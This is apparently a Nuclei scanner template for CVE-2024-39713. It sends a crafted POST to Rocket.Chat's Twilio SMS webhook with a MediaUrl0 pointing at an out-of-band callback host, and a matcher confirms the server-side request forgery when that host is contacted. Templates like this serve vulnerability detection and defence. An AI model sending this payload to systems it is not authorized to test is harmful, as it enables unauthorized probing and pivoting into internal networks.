id: CVE-2024-39713

info:
  name: Rocket.Chat SSRF (CVE-2024-39713)
  author: typical_pashochek
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
  tags: ssrf, poc, cve, rocket.chat
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39713
    - https://hackerone.com/reports/1886954

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/livechat/sms-incoming/twilio"
    headers:
      Content-Type: application/json
    body: |
      {
        "To": "+123",
        "From": "+123",
        "Body": "body",
        "NumMedia": "1",
        "MediaUrl0": "http://{{interactsh-url}}",
        "MediaContentType0": "text/plain"
      }
    
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"